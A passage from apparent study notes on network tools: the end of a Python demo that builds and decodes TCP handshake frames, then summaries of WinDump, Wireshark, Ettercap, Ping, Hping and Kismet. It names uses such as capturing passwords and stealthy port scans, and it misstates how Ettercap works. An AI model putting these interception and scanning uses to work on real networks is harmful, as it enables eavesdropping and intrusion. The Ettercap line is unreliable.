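    which each side sends its own FIN and acknowledges the other's."""
    c, s = (CLIENT, SERVER, 40000, 80), (SERVER, CLIENT, 80, 40000)
    return [
        build_frame(*c, SYN, seq=100),
        build_frame(*s, SYN | ACK, seq=500, ack=101),
        build_frame(*c, ACK, seq=101, ack=501),
        build_frame(*c, FIN | ACK, seq=101, ack=501),
        build_frame(*s, ACK, seq=501, ack=102),
        build_frame(*s, FIN | ACK, seq=501, ack=102),
        build_frame(*c, ACK, seq=102, ack=502),
    ]


if __name__ == "__main__":
    for frame in demo_capture():
        pkt = decode_frame(frame)
        print(f"{stage(pkt):8} {tcpdump_line(pkt)}")
```

The flag strings come out as S, S., ., F., ., F., . in capture order, the same sequence tcpdump prints for a clean open and close. A stream of S packets with no following S. or . from the same client is the packet-level view of the connect scan discussed under Netcat, and it is what a sniffer-based detector would count.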
Windump
- WinDump is the tcpdump command's counterpart for Windows systems.
- All functions offered by tcpdump are implemented in WinDump, so every operation that can be done with tcpdump can be done on Windows as well, using WinDump.
- The Windump command relies on the WinPcap driver for packet capture, so both need to be installed.

Wireshark
- A network packet analyzer tries to capture network packets and to display that packet data in as much detail as possible.
- Wireshark is an open-source network packet analyzer.
- Some intended purposes:
  - to troubleshoot network problems
  - to examine security problems
  - to verify network applications
  - to debug protocol implementations
  - to learn network protocol internals
- The following are some of the many features Wireshark provides:
  - Available for UNIX and Windows.
  - Capture live packet data from a network interface.
  - Display packets with very detailed protocol information.
  - Import files from many other capture programs: it can open files containing packet data captured with tcpdump/WinDump and many other packet capture programs.
  - Export files for many other capture programs: it can save captured packets in many formats, including those used by other capture programs.
  - Save captured packet data.
  - Search for packets on many criteria.
  - Filter packets on many criteria.
  - Create various statistics.

Ettercap
- Ettercap is a free and open-source network security tool for man-in-the-middle attacks on a LAN.
- It runs on Windows and various Unix-like operating systems.
- The method Ettercap relies on is configuring a particular switch port so that all traffic on the switch also gets sent to that "switch monitoring" port.
- It can be used for computer network protocol analysis and security auditing.
- It is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols.

Ping
- Ping is a networking utility used in IP networks.
- Ping is a basic Internet program that allows a user to verify whether a particular IP address exists and, if it exists, whether it can accept requests.
- Ping works by sending an Internet Control Message Protocol (ICMP) Echo Request to a specified interface on the network and waiting for a reply.
- Ping can be used for troubleshooting: to test connectivity and determine response time.

Hping
- It is one type of tester for network security.
- This program allows the user to do the same kind of testing as ping, but using any IP packet, including ICMP, UDP and TCP.
- By default hping uses TCP instead of ICMP.
- It constructs empty TCP packets and sends them to a port of the target.
- Hping usage:
  - Determine a host's status when ping does not work.
  - Test firewall rules.
  - Scan ports without being noticed.
  - Identify the operating system.

Kismet: Wireless monitoring tool
- Kismet is the most widely used and up-to-date open-source wireless monitoring tool, licensed under the GNU GPL (General Public License).
- It is a network detector, passive packet sniffer, and intrusion detection system for 802.11 wireless LANs.
- It will work with any wireless card which supports RF monitoring mode.
- The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and Mac OS X.
- It can discover and log the IP range of any detected wireless network and report its signal and noise levels.
- Basically there are three separate parts in the Kismet architecture:
  - Drone
  - Server
  - Client
- Kismet Drone:
  - The drone collects the information packets from the network that are to be displayed.
- Kismet Server:
  - The server accepts the information packets from the drone for interpretation.
  - The server works in conjunction with a drone or works on its own.
  - It interprets the packet data, extrapolates the wireless information and organizes it.
- Kismet Client:
  - The client communicates with the server and displays the information the server collects.
